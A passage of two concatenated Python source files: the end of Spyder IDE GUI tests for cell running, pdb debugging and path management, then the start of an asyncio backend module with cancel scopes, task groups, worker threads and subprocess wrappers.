with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(0' in shell._control.toPlainText()
assert 'cell is empty' not in shell._control.toPlainText()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(1' in shell._control.toPlainText()
assert 'Error' not in shell._control.toPlainText()
assert 'cell is empty' in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_pdb(main_window, qtbot):
"""Test the runcell command in pdb."""
# Write code with a cell to a file
code = ("if 'abba' in dir():\n"
" print('abba {}'.format(abba))\n"
"else:\n"
" def foo():\n"
" abba = 27\n"
" foo()\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Start debugging
qtbot.mouseClick(debug_button, Qt.LeftButton)
for key in ['n', 'n', 's', 'n', 'n']:
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>',
timeout=3000)
qtbot.keyClick(shell._control, key)
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
assert shell.get_value('abba') == 27
code_editor.setFocus()
# call runcell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: "!runcell" in shell._control.toPlainText())
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Make sure the local variables are detected
assert "abba 27" in shell._control.toPlainText()
# --- Path manager
# ----------------------------------------------------------------------------
@pytest.mark.slow
def test_path_manager_updates_clients(qtbot, main_window, tmpdir):
"""Check that on path manager updates, consoles correctly update."""
main_window.show_path_manager()
dlg = main_window._path_manager
test_folder = 'foo-spam-bar-123'
folder = str(tmpdir.mkdir(test_folder))
dlg.add_path(folder)
qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT)
with qtbot.waitSignal(dlg.sig_path_changed):
dlg.button_ok.animateClick()
cmd = 'import sys;print(sys.path)'
# Check Spyder is updated
main_window.console.execute_lines(cmd)
syspath = main_window.console.get_sys_path()
assert folder in syspath
# Check clients are updated
count = 0
for client in main_window.ipyconsole.get_clients():
shell = client.shellwidget
if shell is not None:
syspath = shell.execute(cmd)
control = shell._control
# `shell.executed` signal was not working so we use waitUntil
qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(),
timeout=EVAL_TIMEOUT)
assert test_folder in control.toPlainText()
count += 1
assert count >= 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It times out on macOS and Windows")
def test_pbd_key_leak(main_window, qtbot, tmpdir):
"""
Check that notifying Spyder from pdb doesn't call
QApplication.processEvents(). If it does, there might be keystroke leakage.
See spyder-ide/spyder#10834.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Replace QApplication.processEvents to make sure it is not called
super_processEvents = QApplication.processEvents
def processEvents():
processEvents.called = True
return super_processEvents()
processEvents.called = False
try:
QApplication.processEvents = processEvents
# Debug and open both files
shell.execute('%debug')
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClick(control, 'u')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
# Wait until both files are open
qtbot.waitUntil(
lambda: osp.normpath(str(test_file)) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
qtbot.waitUntil(
lambda: str(test_file2) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
# Make sure the events are not processed.
assert not processEvents.called
finally:
QApplication.processEvents = super_processEvents
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS")
def test_pbd_step(main_window, qtbot, tmpdir):
"""
Check that notifying Spyder from pdb only moves the editor when a new line is reached.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Debug and enter first file
shell.execute('%debug')
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file)))
# Go up and enter second file
qtbot.keyClick(control, 'u')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2)))
# Go back to first file
editor_stack = main_window.editor.get_current_editorstack()
index = editor_stack.has_filename(str(test_file))
assert index is not None
editor_stack.set_stack_index(index)
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
# Change frame but stay at the same place
qtbot.keyClicks(control, 'test = 0')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
qtbot.wait(1000)
# Make sure we didn't move
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_after_restart(main_window, qtbot):
"""Test runcell after a kernel restart."""
# Write code to a file
code = "print('test_runcell_after_restart')"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# call runcell
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(
lambda: "test_runcell_after_restart" in shell._control.toPlainText())
# Make sure no errors are shown
assert "error" not in shell._control.toPlainText().lower()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="It fails sometimes on Linux")
@pytest.mark.parametrize(
"ipython", [True, False])
@pytest.mark.parametrize(
"test_cell_magic", [True, False])
def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic):
"""Test the runcell command with cell magic."""
# Write code with a cell to a file
write_file = tmpdir.mkdir("foo").join("bar.txt")
assert not osp.exists(to_text_string(write_file))
if test_cell_magic:
code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n"
else:
code = "\n\n%debug print()"
if ipython:
fn = "cell-test.ipy"
else:
fn = "cell-test.py"
p = tmpdir.join(fn)
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(0, r'{}')".format(to_text_string(p)))
control = main_window.ipyconsole.get_focus_widget()
error_text = 'save this file with the .ipy extension'
try:
if ipython:
if test_cell_magic:
qtbot.waitUntil(
lambda: 'Writing' in control.toPlainText())
# Verify that the code was executed
assert osp.exists(to_text_string(write_file))
else:
qtbot.waitUntil(lambda: 'ipdb>' in control.toPlainText())
assert error_text not in control.toPlainText()
else:
qtbot.waitUntil(lambda: error_text in control.toPlainText())
finally:
if osp.exists(to_text_string(write_file)):
os.remove(to_text_string(write_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_running_namespace(main_window, qtbot, tmpdir):
"""
Test that the running namespace is correctly sent when debugging in a
new namespace.
"""
code = ("def test(a):\n print('a:',a)\na = 10\ntest(5)")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=2)
# Write b in the namespace
with qtbot.waitSignal(shell.executed):
shell.execute('b = 10')
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['b']['view'] == '10'
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# b should not be there (running namespace) and the local a should be 5
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and
nsb.editor.source_model._data['a']['view'] == '5',
timeout=3000)
assert 'b' not in nsb.editor.source_model._data
assert nsb.editor.source_model._data['a']['view'] == '5'
with qtbot.waitSignal(shell.executed):
shell.execute('c')
# At the end, b should be back and a should be 10
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['a']['view'] == '10'
assert nsb.editor.source_model._data['b']['view'] == '10'
@pytest.mark.slow
@flaky(max_runs=3)
def test_post_mortem(main_window, qtbot, tmpdir):
"""Test post mortem works"""
# Check we can use custom complete for pdb
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_focus_widget()
test_file = tmpdir.join('test.py')
test_file.write('raise RuntimeError\n')
with qtbot.waitSignal(shell.executed):
shell.execute(
"runfile(" + repr(str(test_file)) + ", post_mortem=True)")
assert "ipdb>" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_unsaved_file_multiprocessing(main_window, qtbot):
"""Test that we can run an unsaved file with multiprocessing."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"import multiprocessing\n"
"import traceback\n"
'if __name__ == "__main__":\n'
" p = multiprocessing.Process(target=traceback.print_exc)\n"
" p.start()\n"
" p.join()\n"
)
# This code should run even on windows
# Start running
qtbot.mouseClick(run_button, Qt.LeftButton)
# Because multiprocessing behaves strangely on Windows, only some
# situations work. This is one of them, so it shouldn't be broken.
if os.name == 'nt':
qtbot.waitUntil(
lambda: "Warning: multiprocessing" in shell._control.toPlainText())
else:
# There is no exception, so the exception is None
qtbot.waitUntil(
lambda: 'None' in shell._control.toPlainText())
if __name__ == "__main__":
pytest.main()
|
_asyncio.py
|
import asyncio
import concurrent.futures
import math
import socket
import sys
from collections import OrderedDict, deque
from concurrent.futures import Future
from dataclasses import dataclass
from functools import wraps
from inspect import isgenerator
from socket import AddressFamily, SocketKind, SocketType
from threading import Thread
from types import TracebackType
from typing import (
Callable, Set, Optional, Union, Tuple, cast, Coroutine, Any, Awaitable, TypeVar, Generator,
List, Dict, Sequence, Type, Deque)
from weakref import WeakKeyDictionary
from .. import abc, TaskInfo
from .._core._eventloop import threadlocals, claim_worker_thread
from .._core._exceptions import (
ExceptionGroup as BaseExceptionGroup, ClosedResourceError, BusyResourceError, WouldBlock,
BrokenResourceError, EndOfStream)
from .._core._sockets import GetAddrInfoReturnType, convert_ipv6_sockaddr
from .._core._synchronization import ResourceGuard
from ..abc.sockets import IPSockAddrType, UDPPacketType
if sys.version_info >= (3, 7):
from asyncio import create_task, get_running_loop, current_task, all_tasks, run as native_run
from contextlib import asynccontextmanager
else:
from async_generator import asynccontextmanager
_T = TypeVar('_T')
def native_run(main, *, debug=False):
# Snatched from Python 3.7
from asyncio import coroutines
from asyncio import events
from asyncio import tasks
def _cancel_all_tasks(loop):
to_cancel = all_tasks(loop)
if not to_cancel:
return
for task in to_cancel:
task.cancel()
loop.run_until_complete(
tasks.gather(*to_cancel, loop=loop, return_exceptions=True))
for task in to_cancel:
if task.cancelled():
continue
if task.exception() is not None:
loop.call_exception_handler({
'message': 'unhandled exception during asyncio.run() shutdown',
'exception': task.exception(),
'task': task,
})
if events._get_running_loop() is not None:
raise RuntimeError(
"asyncio.run() cannot be called from a running event loop")
if not coroutines.iscoroutine(main):
raise ValueError("a coroutine was expected, got {!r}".format(main))
loop = events.new_event_loop()
try:
events.set_event_loop(loop)
loop.set_debug(debug)
return loop.run_until_complete(main)
finally:
try:
_cancel_all_tasks(loop)
loop.run_until_complete(loop.shutdown_asyncgens())
finally:
events.set_event_loop(None)
loop.close()
def create_task(coro: Union[Generator[Any, None, _T], Awaitable[_T]], *, # type: ignore
name: Optional[str] = None) -> asyncio.Task:
return get_running_loop().create_task(coro)
def get_running_loop() -> asyncio.AbstractEventLoop:
loop = asyncio._get_running_loop()
if loop is not None:
return loop
else:
raise RuntimeError('no running event loop')
def all_tasks(loop: Optional[asyncio.AbstractEventLoop] = None) -> Set[asyncio.Task]:
"""Return a set of all tasks for the loop."""
from asyncio import Task
if loop is None:
loop = get_running_loop()
return {t for t in Task.all_tasks(loop) if not t.done()}
def current_task(loop: Optional[asyncio.AbstractEventLoop] = None) -> Optional[asyncio.Task]:
if loop is None:
loop = get_running_loop()
return asyncio.Task.current_task(loop)
T_Retval = TypeVar('T_Retval')
# Check whether there is native support for task names in asyncio (3.8+)
_native_task_names = hasattr(asyncio.Task, 'get_name')
def get_callable_name(func: Callable) -> str:
module = getattr(func, '__module__', None)
qualname = getattr(func, '__qualname__', None)
return '.'.join([x for x in (module, qualname) if x])
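# Illustrative check (not part of the original module): get_callable_name()
# joins __module__ and __qualname__ with a dot, skipping whichever is missing,
# so nested functions keep their '<locals>' qualifier.
def _example_get_callable_name() -> str:
    def sample() -> None:
        pass
    # Returns something like '<module>._example_get_callable_name.<locals>.sample',
    # where the module part depends on where this sketch is defined.
    return get_callable_name(sample)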
#
# Event loop
#
def _maybe_set_event_loop_policy(policy: Optional[asyncio.AbstractEventLoopPolicy],
use_uvloop: bool) -> None:
# On CPython, use uvloop when possible if no other policy has been given and if not
# explicitly disabled
if policy is None and use_uvloop and sys.implementation.name == 'cpython':
try:
import uvloop
except ImportError:
pass
else:
# Test for missing shutdown_default_executor() (uvloop 0.14.0 and earlier)
if (not hasattr(asyncio.AbstractEventLoop, 'shutdown_default_executor')
or hasattr(uvloop.loop.Loop, 'shutdown_default_executor')):
policy = uvloop.EventLoopPolicy()
if policy is not None:
asyncio.set_event_loop_policy(policy)
def run(func: Callable[..., T_Retval], *args, debug: bool = False, use_uvloop: bool = True,
policy: Optional[asyncio.AbstractEventLoopPolicy] = None) -> T_Retval:
@wraps(func)
async def wrapper():
task = current_task()
task_state = TaskState(None, get_callable_name(func), None)
_task_states[task] = task_state
if _native_task_names:
task.set_name(task_state.name)
try:
return await func(*args)
finally:
del _task_states[task]
_maybe_set_event_loop_policy(policy, use_uvloop)
return native_run(wrapper(), debug=debug)
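# Minimal usage sketch (assumption: called from synchronous code, not from a
# running event loop): run() forwards positional arguments to the coroutine
# function and registers a TaskState entry for the root task before awaiting it.
def _example_run() -> int:
    async def main(x: int) -> int:
        await sleep(0)
        return x + 1
    # use_uvloop=False keeps the stock asyncio event loop policy regardless of
    # whether uvloop is installed.
    return run(main, 41, use_uvloop=False)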
#
# Miscellaneous
#
async def sleep(delay: float) -> None:
await checkpoint()
await asyncio.sleep(delay)
#
# Timeouts and cancellation
#
CancelledError = asyncio.CancelledError
class CancelScope(abc.CancelScope):
__slots__ = ('_deadline', '_shield', '_parent_scope', '_cancel_called', '_active',
'_timeout_task', '_tasks', '_host_task', '_timeout_expired')
def __init__(self, deadline: float = math.inf, shield: bool = False):
self._deadline = deadline
self._shield = shield
self._parent_scope: Optional[CancelScope] = None
self._cancel_called = False
self._active = False
self._timeout_task: Optional[asyncio.Task] = None
self._tasks: Set[asyncio.Task] = set()
self._host_task: Optional[asyncio.Task] = None
self._timeout_expired = False
async def __aenter__(self):
async def timeout():
await asyncio.sleep(self._deadline - get_running_loop().time())
self._timeout_expired = True
await self.cancel()
if self._active:
raise RuntimeError(
"Each CancelScope may only be used for a single 'async with' block"
)
self._host_task = current_task()
self._tasks.add(self._host_task)
try:
task_state = _task_states[self._host_task]
except KeyError:
task_name = self._host_task.get_name() if _native_task_names else None
task_state = TaskState(None, task_name, self)
_task_states[self._host_task] = task_state
else:
self._parent_scope = task_state.cancel_scope
task_state.cancel_scope = self
if self._deadline != math.inf:
if get_running_loop().time() >= self._deadline:
self._cancel_called = True
self._timeout_expired = True
else:
self._timeout_task = get_running_loop().create_task(timeout())
self._active = True
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
self._active = False
if self._timeout_task:
self._timeout_task.cancel()
assert self._host_task is not None
self._tasks.remove(self._host_task)
host_task_state = _task_states.get(self._host_task)
if host_task_state is not None and host_task_state.cancel_scope is self:
host_task_state.cancel_scope = self._parent_scope
if exc_val is not None:
exceptions = exc_val.exceptions if isinstance(exc_val, ExceptionGroup) else [exc_val]
if all(isinstance(exc, CancelledError) for exc in exceptions):
if self._timeout_expired:
return True
elif not self._parent_cancelled():
# This scope was directly cancelled
return True
return None
async def _cancel(self):
# Deliver cancellation to directly contained tasks and nested cancel scopes
for task in self._tasks:
# Cancel the task directly, but only if it's blocked and isn't within a shielded scope
cancel_scope = _task_states[task].cancel_scope
if cancel_scope is self:
# Only deliver the cancellation if the task is already running (but not this task!)
try:
running = task._coro.cr_running
awaitable = task._coro.cr_await
except AttributeError:
running = task._coro.gi_running
awaitable = task._coro.gi_yieldfrom
if not running and awaitable is not None:
task.cancel()
elif not cancel_scope._shielded_to(self):
await cancel_scope._cancel()
def _shielded_to(self, parent: Optional['CancelScope']) -> bool:
# Check whether this task or any parent up to (but not including) the "parent" argument is
# shielded
cancel_scope: Optional[CancelScope] = self
while cancel_scope is not None and cancel_scope is not parent:
if cancel_scope._shield:
return True
else:
cancel_scope = cancel_scope._parent_scope
return False
def _parent_cancelled(self) -> bool:
# Check whether any parent has been cancelled
cancel_scope = self._parent_scope
while cancel_scope is not None and not cancel_scope._shield:
if cancel_scope._cancel_called:
return True
else:
cancel_scope = cancel_scope._parent_scope
return False
async def cancel(self) -> None:
if self._cancel_called:
return
self._cancel_called = True
await self._cancel()
@property
def deadline(self) -> float:
return self._deadline
@property
def cancel_called(self) -> bool:
return self._cancel_called
@property
def shield(self) -> bool:
return self._shield
async def checkpoint():
try:
cancel_scope = _task_states[current_task()].cancel_scope
except KeyError:
cancel_scope = None
while cancel_scope:
if cancel_scope.cancel_called:
raise CancelledError
elif cancel_scope.shield:
break
else:
cancel_scope = cancel_scope._parent_scope
await asyncio.sleep(0)
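# Sketch (not part of the original module): checkpoint() is where a pending
# cancellation becomes visible, so cancelling the enclosing scope makes the
# next checkpoint raise CancelledError inside that scope.
async def _example_checkpoint_sees_cancellation() -> bool:
    async with CancelScope() as scope:
        await scope.cancel()
        try:
            await checkpoint()
        except CancelledError:
            return True
    return False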
@asynccontextmanager
async def fail_after(delay: float, shield: bool):
deadline = get_running_loop().time() + delay
async with CancelScope(deadline, shield) as scope:
yield scope
if scope._timeout_expired:
raise TimeoutError
@asynccontextmanager
async def move_on_after(delay: float, shield: bool):
deadline = get_running_loop().time() + delay
async with CancelScope(deadline=deadline, shield=shield) as scope:
yield scope
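# Usage sketch (illustrative): fail_after() raises TimeoutError once the
# deadline expires, while move_on_after() just leaves the block with the
# scope's cancel_called flag set.
async def _example_move_on_after() -> bool:
    async with move_on_after(0.05, shield=False) as scope:
        await sleep(1)  # cancelled once the deadline passes
    return scope.cancel_called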
async def current_effective_deadline():
deadline = math.inf
cancel_scope = _task_states[current_task()].cancel_scope
while cancel_scope:
deadline = min(deadline, cancel_scope.deadline)
if cancel_scope.shield:
break
else:
cancel_scope = cancel_scope._parent_scope
return deadline
async def current_time():
return get_running_loop().time()
#
# Task states
#
class TaskState:
"""
Encapsulates auxiliary task information that cannot be added to the Task instance itself
because there are no guarantees about its implementation.
"""
__slots__ = 'parent_id', 'name', 'cancel_scope'
def __init__(self, parent_id: Optional[int], name: Optional[str],
cancel_scope: Optional[CancelScope]):
self.parent_id = parent_id
self.name = name
self.cancel_scope = cancel_scope
_task_states = WeakKeyDictionary() # type: WeakKeyDictionary[asyncio.Task, TaskState]
#
# Task groups
#
class ExceptionGroup(BaseExceptionGroup):
def __init__(self, exceptions: Sequence[BaseException]):
super().__init__()
self.exceptions = exceptions
class TaskGroup(abc.TaskGroup):
__slots__ = 'cancel_scope', '_active', '_exceptions'
def __init__(self):
self.cancel_scope: CancelScope = CancelScope()
self._active = False
self._exceptions: List[BaseException] = []
async def __aenter__(self):
await self.cancel_scope.__aenter__()
self._active = True
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
ignore_exception = await self.cancel_scope.__aexit__(exc_type, exc_val, exc_tb)
if exc_val is not None:
await self.cancel_scope.cancel()
if not ignore_exception:
self._exceptions.append(exc_val)
while self.cancel_scope._tasks:
try:
await asyncio.wait(self.cancel_scope._tasks)
except asyncio.CancelledError:
await self.cancel_scope.cancel()
self._active = False
if not self.cancel_scope._parent_cancelled():
exceptions = self._filter_cancellation_errors(self._exceptions)
else:
exceptions = self._exceptions
try:
if len(exceptions) > 1:
raise ExceptionGroup(exceptions)
elif exceptions and exceptions[0] is not exc_val:
raise exceptions[0]
except BaseException as exc:
# Clear the context here, as it can only be done in-flight.
# If the context is not cleared, it can result in recursive tracebacks (see #145).
exc.__context__ = None
raise
return ignore_exception
@staticmethod
def _filter_cancellation_errors(exceptions: Sequence[BaseException]) -> List[BaseException]:
filtered_exceptions: List[BaseException] = []
for exc in exceptions:
if isinstance(exc, ExceptionGroup):
exc.exceptions = TaskGroup._filter_cancellation_errors(exc.exceptions)
if exc.exceptions:
if len(exc.exceptions) > 1:
filtered_exceptions.append(exc)
else:
filtered_exceptions.append(exc.exceptions[0])
elif not isinstance(exc, CancelledError):
filtered_exceptions.append(exc)
return filtered_exceptions
async def _run_wrapped_task(self, func: Callable[..., Coroutine], args: tuple) -> None:
task = cast(asyncio.Task, current_task())
try:
await func(*args)
except BaseException as exc:
self._exceptions.append(exc)
await self.cancel_scope.cancel()
finally:
self.cancel_scope._tasks.remove(task)
del _task_states[task] # type: ignore
async def spawn(self, func: Callable[..., Coroutine], *args, name=None) -> None:
if not self._active:
raise RuntimeError('This task group is not active; no new tasks can be spawned.')
name = name or get_callable_name(func)
if _native_task_names is None:
task = create_task(self._run_wrapped_task(func, args), name=name) # type: ignore
else:
task = create_task(self._run_wrapped_task(func, args))
# Make the spawned task inherit the task group's cancel scope
_task_states[task] = TaskState(parent_id=id(current_task()), name=name,
cancel_scope=self.cancel_scope)
self.cancel_scope._tasks.add(task)
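# Illustrative sketch (not part of the backend itself): structured concurrency
# with the TaskGroup above. The child coroutine and its labels are invented for
# the example.
async def _example_task_group():
    async def child(label):
        await checkpoint()
        return label
    async with TaskGroup() as tg:
        # spawn() schedules each coroutine inside the group's cancel scope; the
        # group waits for all children before __aexit__ returns.
        await tg.spawn(child, 'first')
        await tg.spawn(child, 'second')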
#
# Threads
#
_Retval_Queue_Type = Tuple[Optional[T_Retval], Optional[BaseException]]
async def run_sync_in_worker_thread(
func: Callable[..., T_Retval], *args, cancellable: bool = False,
limiter: Optional['CapacityLimiter'] = None) -> T_Retval:
def thread_worker():
try:
with claim_worker_thread('asyncio'):
threadlocals.loop = loop
result = func(*args)
except BaseException as exc:
if not loop.is_closed():
asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
if not cancelled:
loop.call_soon_threadsafe(queue.put_nowait, (None, exc))
else:
if not loop.is_closed():
asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
if not cancelled:
loop.call_soon_threadsafe(queue.put_nowait, (result, None))
await checkpoint()
loop = get_running_loop()
task = current_task()
queue: asyncio.Queue[_Retval_Queue_Type] = asyncio.Queue(1)
cancelled = False
limiter = limiter or _default_thread_limiter
await limiter.acquire_on_behalf_of(task)
thread = Thread(target=thread_worker, daemon=True)
thread.start()
async with CancelScope(shield=not cancellable):
try:
retval, exception = await queue.get()
finally:
cancelled = True
if exception is not None:
raise exception
else:
return cast(T_Retval, retval)
def run_async_from_thread(func: Callable[..., Coroutine[Any, Any, T_Retval]], *args) -> T_Retval:
f: concurrent.futures.Future[T_Retval] = asyncio.run_coroutine_threadsafe(
func(*args), threadlocals.loop)
return f.result()
class BlockingPortal(abc.BlockingPortal):
__slots__ = '_loop'
def __init__(self):
super().__init__()
self._loop = get_running_loop()
def _spawn_task_from_thread(self, func: Callable, args: tuple, future: Future) -> None:
asyncio.run_coroutine_threadsafe(
self._task_group.spawn(self._call_func, func, args, future), self._loop)
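# Illustrative sketch (not part of the backend itself): off-loading a blocking
# call to a worker thread with run_sync_in_worker_thread(). time.sleep stands in
# for any blocking function; the 0.01 second delay is an arbitrary example value.
async def _example_worker_thread():
    import time
    # The default limiter (40 tokens) caps the number of concurrent worker threads.
    await run_sync_in_worker_thread(time.sleep, 0.01)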
#
# Subprocesses
#
@dataclass
class StreamReaderWrapper(abc.ByteReceiveStream):
_stream: asyncio.StreamReader
async def receive(self, max_bytes: int = 65536) -> bytes:
data = await self._stream.read(max_bytes)
if data:
return data
else:
raise EndOfStream
async def aclose(self) -> None:
self._stream.feed_eof()
@dataclass
class StreamWriterWrapper(abc.ByteSendStream):
_stream: asyncio.StreamWriter
async def send(self, item: bytes) -> None:
self._stream.write(item)
await self._stream.drain()
async def aclose(self) -> None:
self._stream.close()
@dataclass
class Process(abc.Process):
_process: asyncio.subprocess.Process
_stdin: Optional[abc.ByteSendStream]
_stdout: Optional[abc.ByteReceiveStream]
_stderr: Optional[abc.ByteReceiveStream]
async def aclose(self) -> None:
if self._stdin:
await self._stdin.aclose()
if self._stdout:
await self._stdout.aclose()
if self._stderr:
await self._stderr.aclose()
await self.wait()
async def wait(self) -> int:
return await self._process.wait()
def terminate(self) -> None:
self._process.terminate()
def kill(self) -> None:
self._process.kill()
def send_signal(self, signal: int) -> None:
self._process.send_signal(signal)
@property
def pid(self) -> int:
return self._process.pid
@property
def returncode(self) -> Optional[int]:
return self._process.returncode
@property
def stdin(self) -> Optional[abc.ByteSendStream]:
return self._stdin
@property
def stdout(self) -> Optional[abc.ByteReceiveStream]:
return self._stdout
@property
def stderr(self) -> Optional[abc.ByteReceiveStream]:
return self._stderr
async def open_process(command, *, shell: bool, stdin: int, stdout: int, stderr: int):
await checkpoint()
if shell:
process = await asyncio.create_subprocess_shell(command, stdin=stdin, stdout=stdout,
stderr=stderr)
else:
process = await asyncio.create_subprocess_exec(*command, stdin=stdin, stdout=stdout,
stderr=stderr)
stdin_stream = StreamWriterWrapper(process.stdin) if process.stdin else None
stdout_stream = StreamReaderWrapper(process.stdout) if process.stdout else None
stderr_stream = StreamReaderWrapper(process.stderr) if process.stderr else None
return Process(process, stdin_stream, stdout_stream, stderr_stream)
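# Illustrative sketch (not part of the backend itself): spawning a subprocess
# through open_process() and reading its output. The echo command and PIPE
# settings are example choices only.
async def _example_subprocess():
    proc = await open_process(['echo', 'hello'], shell=False,
                              stdin=asyncio.subprocess.PIPE,
                              stdout=asyncio.subprocess.PIPE,
                              stderr=asyncio.subprocess.PIPE)
    output = await proc.stdout.receive()
    await proc.aclose()  # closes the pipes and waits for the process to exit
    return output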
#
# Sockets and networking
#
_read_events: Dict[socket.SocketType, asyncio.Event] = {}
_write_events: Dict[socket.SocketType, asyncio.Event] = {}
class StreamProtocol(asyncio.Protocol):
read_queue: Deque[bytes]
read_event: asyncio.Event
write_event: asyncio.Event
exception: Optional[Exception] = None
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self.read_queue = deque()
self.read_event = asyncio.Event()
self.write_event = asyncio.Event()
self.write_event.set()
cast(asyncio.Transport, transport).set_write_buffer_limits(0)
def connection_lost(self, exc: Optional[Exception]) -> None:
self.exception = exc
self.read_event.set()
self.write_event.set()
def data_received(self, data: bytes) -> None:
self.read_queue.append(data)
self.read_event.set()
